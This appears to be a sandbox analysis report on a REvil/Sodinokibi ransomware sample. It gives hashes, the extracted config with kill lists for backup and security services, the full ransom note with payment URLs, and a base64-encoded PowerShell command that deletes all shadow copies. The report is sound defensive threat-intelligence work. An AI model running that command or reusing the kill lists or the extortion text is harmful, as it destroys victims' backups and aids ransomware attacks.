Overview

overview

10

Static

static

10

2024-03-08...il.exe

windows7-x64

10

2024-03-08...il.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08-03-2024 13:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe

  • Size

    123KB

  • MD5

    4e1af0891819929521ae3d70afcbddbf

  • SHA1

    db49af0ef9a6e05c4cbe2c9edfaec3026ab26c8f

  • SHA256

    7c8055ed9d597c2abbfbb17e070e63fa3c8e337e9ea2169d0aaeb91b1fbd3bdc

  • SHA512

    3cb5f1c8923b2895d2df351eb566d778d952871d297e949108bed0aa82960b979093e419b1f0c3818e10c0a3ad57380b662284d85b6d582aab0ca3da3f9dce8a

  • SSDEEP

    1536:7DvcPmLThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxZ:r4SVhaNcYM8gnBR5uiV1UvQFOxZ

Score
10/10
sodinokibi$2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085persistenceransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr
Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\t51o6cu44p-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension t51o6cu44p. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30324C849872A42C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/30324C849872A42C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: skKhDaCYUjD/YXeXL3HQ990yGY5bq0Qhzxi5ZpT+fpunKSwAPelhuPtD4N6utoRi X6DWsrS7SIAXbNofJxTIl06MC1FBPrdLSYcVoUb96YZmjQkQmnvFrS+PZhT8K8AI NFfbHvbUvztvNI72E8+mgevhZqRlIDLgVS/KRneBWAslxtjmwef/8LDWSnYzFlC2 gWOCUP039NqrdOfJ7v25fOU+01bEU3BZE85djpJSfx5ooTXNOVKt2SLSOeWRPnbE rN25jAzrDxf0XLCkh/ny69SQYhDnh/jddr/ZnqOTQheVSFt13+X6LLrj9Qa911JG dakfgw3i2cAsVIT/E9VDV4QWSwOzvD0UArWoxcjoSoGLBxpElJ9EuXoAXIcZ+TAs b39LzSoaNltZAP+z71g9PI5awFnaihcF/j8WByJcQApYGM0aYrtZ5dnXMm483GQR pwiapSt8DiOWcefBM4lUZVB6MZCzkBNZT7hmBuJNurGvqnGTcTIbY0OTfFvffD9z mvM6UYXzc9mgJZf7PWkJryzgiiXSbJJK+S+Qtt6U4xK5v9IdLkqDlOh7Fwn1F7aE TUrLdT64OBuRjjfgsJBOOA7L2JGc0U6DndzlkkvA2Zw1a2PO+yNhpuPaqcFa7FNN yFgNLx/w16qyV6Y1OePPlq61PPKv0A7m+JVT0adDJ/zghhB/sFZx4qJaWrc67n00 dZI8RfeKMPm9f2XBp8J8FEFLK3fjvP+NW5qKAOGfbt1qk5QN1n9hHB0sMdaus50k Z9s0760r/REewKqj7pUgJWfGxArr9fp59apmMw0QCcanioPCKRKnRspsDFq5i6FY bM3B7W8AJB6QkjH9Py9uy+fRc6G2D0hlI0aBNmavjoYrywalDmG0WJcBF1O4oj4s c+X7gCq6g8YDLqvgPud6JFfWM5L3bg7LZyIBbrqFswCYzkY8ATql74qCKPVdSrKu Ts7Nv5H6YyobEsavW9BIEryX3yBeTgcF3LeKAIhRXA+p/V1qRWX3UcEeAMRUs52z UQVg8ACSxHigPUy1jtYWMty3eKPJ3jPxt44nsVK1cpkqeAjHlmKNtUgjZFoFgTti /coflujKOQGWrgnQQKGssAeu8S7EnM50Id5UnOboiqyYdrm5B29FLvl8FUHC+dDK BWyy09tsFahaqUfxmcHRbGPnemKwKa27QcmDByNwg4Teyk8bdBNVmlGMfkUymjeG dPxUTNUqRB0B4oPnZB9T5SttUXZyiMeFwuczSysbiH5pV126Ewh4YRpP2qxrGLdB HggfkiDydPJRi2tn+VIIwmcbB0vl9oAzMeCD9lU/VbgZrv0NSKYCv3N8rHAZvi0r KegxXmQltaxfohlqCQ0AwxlkCn6u7oT0V8AbjBP3qjGg4XoLpp/f6w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30324C849872A42C

http://decryptor.cc/30324C849872A42C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 31 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1668
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2328
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2844

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabADED.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarB016.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      Download Submit

    • C:\Users\t51o6cu44p-readme.txt
      Filesize

      6KB

      MD5

      20aadfbd7d1579fd8dc2ca89c35ee517

      SHA1

      78c35aa66871bc49973d9e46ee71872dfc9d87b9

      SHA256

      ba939738437a21c9a7ea934cdc2c59169991cdf4e02843cfab0057d121187dd9

      SHA512

      daf075604beb0fb38dd770be4c10617c2040dae62cd516b36b740a2e191fcd2dc64b62c818d1f05012654917a1e62963c5089828b482466ddeea53c1bd6d8e34

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      28f0663c10b000f67af9e9ec2a7f86fb

      SHA1

      52b9589cf4879f8a137aa34b44f8ac311fe6de01

      SHA256

      677025f3fdfbb124c8a81053aa14017dcfc8dd838bc8bcc5cfc9ff36a1b526bb

      SHA512

      6a7157712e5bf7bb788177ce47e6933205978f5a899d4291d367c711bc09b394cb28f67267bf9f849044a2114abee709d93070339bfdbeb54b049ece2505548f

      Download Submit

    • memory/1668-8-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1668-12-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1668-11-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1668-10-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1668-13-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1668-9-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1668-7-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1668-6-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1668-5-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1972-479-0x00000000012C0000-0x00000000012E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1972-0-0x00000000012C0000-0x00000000012E2000-memory.dmp

      Filesize

      136KB

      Download